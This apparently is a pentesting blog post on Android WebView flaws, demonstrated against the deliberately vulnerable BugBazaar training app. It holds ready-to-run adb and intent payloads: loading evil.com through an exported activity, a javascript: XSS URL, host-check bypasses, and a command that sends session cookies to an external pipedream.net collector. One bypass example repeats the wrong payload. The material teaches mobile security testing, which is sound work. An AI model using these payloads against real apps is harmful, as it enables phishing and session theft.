In the rapidly evolving landscape of mobile security, WebView vulnerabilities represent a significant threat vector. WebView, a critical component in Android applications, allows developers to embed web content directly within their apps. However, it can be misused by attackers to execute malicious code, steal sensitive information, and compromise the overall security of an app. In this blog post, we’ll delve into common WebView vulnerabilities, the methods used to exploit them, and best practices to secure your app effectively.

What is WebView?

WebView extends Android’s View class, rendering web content (HTML, JavaScript, CSS) within an app. It is widely used for embedding web pages, displaying online content, and creating hybrid apps that combine web and native components. This functionality is powerful, but if not implemented securely, it can open up significant vulnerabilities.

Common WebView Vulnerabilities

1. Unrestricted WebView Content Loading: Allowing WebView to load content from untrusted sources can lead to phishing attacks and the execution of malicious scripts.
2. Cross-Site Scripting (XSS): If a WebView loads content from multiple sources, it can be vulnerable to XSS, enabling attackers to inject and execute arbitrary code.
3. Open Redirection: It is a vulnerability where an app permits external URLs to redirect users to arbitrary destinations. Attackers exploit this by creating URLs that seem legitimate but actually lead to malicious sites. In the context of WebView, this can result in phishing attacks or other security breaches. Developers should carefully validate and sanitize redirection URLs to prevent this risk.
4. Account Takeover via Stealing Session ID (Host validation bypass): It allows an attacker to steal a valid session ID (such as from a legitimate website) and use it to impersonate the user, potentially gaining unauthorized access to their account. Proper host validation is crucial to prevent this security risk
5. JavaScript Interface Injection: This occurs when an app exposes its interface to JavaScript in a WebView, allowing attackers to call methods in the app from a malicious webpage.
6. Access of Arbitrary files via insecure Flags: WebView allows loading local files (e.g., HTML, CSS, JavaScript) from the app’s assets or storage. If an app uses insecure flags (e.g., file:/// URLs without proper restrictions), an attacker could exploit this to access sensitive files on the device.

In this series, we’ll explore different security issues related to WebView. In the first part, we’ll discuss the risks of opening arbitrary URLs in the WebView, cross-site scripting (XSS) vulnerabilities, and the dangers of open redirection. We’ll also cover the possibility of an attacker taking over a user’s account by stealing their session ID. Stay tuned for the next blog post, where we’ll look at how user tokens can be stolen via the JavaScriptInterface class and discuss accessing arbitrary files insecurely.

This analysis uses the BugBazaar APK developed by Payatu to emulate real-world scenarios. Now, Let’s decompile the app using jadx-gui. 

‍Exploit WebView Vulnerabilities:

1. Unrestricted WebView Content Loading: 

An unsafe URI Loading occurs when an Android application fails to correctly evaluate the validity of a URI before loading it into a WebView, which can lead to various security risks including phishing, drive-by downloads, and exposure to malicious content.

Example Scenario:

After decompiling the APK, the AndroidManifest.xml file was examined to identify exported activities. There’s one of them that look like this:

com.BugBazaar.ui.TermsAndConditionsActivity activity is set to android:exported=”true” means it can be launched by components from other applications.

Let’s deep dive into this TermsAndConditionsActivity class.

The function startWebView can be observed here. It is loading the url by getting the string from intent with the extra webViewUrl. So this behavior can be exploited by third party applications by sending an intent to this component with a url string and the target application will accept and execute as this component has been exported. i.e., third party applications have access to the webview component in the target application.

StringExtra: A “StringExtra” is a type of extra information that can be passed between Android components, such as activities or services, using an Intent object. It is a key-value pair where the key is a string identifier and the value is a string data. StringExtra is commonly used to pass simple text data, such as a username or password, from one component to another. The receiving component can retrieve the StringExtra value by using the key to access the Intent extras bundle. StringExtra is a part of the Android SDK and is used in Android app development.

Exploitation: 

1. Using ADB:

adb shell am start -n

com.BugBazaar/.ui.TermsAndConditionsActivity --es

webViewUrl "https://evil.com" 

2. Using Android Studio:

Intent intent = new Intent();

intent.setClassName("com.BugBazaar","com.BugBazaar.ui.TermsAndConditionsActivity");

intent.putExtra("webViewUrl","https://evil.com/");

startActivity(intent);

2. Cross-Site Scripting (XSS):

As neither it is checking any scheme nor host so any scheme and host can be loaded in its WebView. 

Exploitation:

adb shell am start -n com.BugBazaar/.ui.TermsAndConditionsActivity --es webViewUrl “javascript:alert(/xss by RedSentry/)”

3. Open Redirect:

Open redirection occurs when an app allows external URLs to redirect to arbitrary destinations. Attackers can abuse this by crafting URLs that appear legitimate but actually redirect users to malicious sites. In the context of WebView, this can lead to phishing attacks or other security breaches.

Here we can see that it checks if our host startswith bugbazaar.com or endswith .bugbazaar.com. Now we can easily bypass this validation check and load our desired host. Let’s crafted the payload for this

Exploitation:

For startswith: https://bugbazaar.com@evil.com

adb shell am start -n com.BugBazaar/.ui.TermsAndConditionsActivity --es webViewUrl “https://bugbazaar.com@evil.com”

For endswith: https://evil.com/?.bugbazaar.com 

adb shell am start -n com.BugBazaar/.ui.TermsAndConditionsActivity --es webViewUrl “https://bugbazaar.com@evil.com”

Every Time, it'll be redirected to our host, here the host is evil.com.

4. Account Takeover via Stealing Session ID (Host validation bypass):

In some cases, WebView-based apps may not properly validate the host of a session cookie. An attacker could exploit this by stealing a valid session ID (e.g., from a legitimate website) and using it to impersonate the user. This can lead to unauthorized access to the user’s account.

What can we see here? Any host that ends with .bugbazaar.com then it’ll send the cookie.

Exploitation:

adb shell am start -n com.BugBazaar/.ui.TermsAndConditionsActivity --es webViewUrl "https://eokbtejc132zazd.m.pipedream.net/?.bugbazaar.com”

Poc Recap: BugBazaar_poc.mp4

In the upcoming blog, we are going to explore more attack vectors related to Android application pentesting. Hope you learned something new and enjoyed my blog. Stay safe, stay curious.

References:

https://github.com/payatu/BugBazaar/ [vuln apps]

Webviews – Unsafe URI Loading  |  App quality  |  Android Developers

Android security checklist: WebView | Oversecured Blog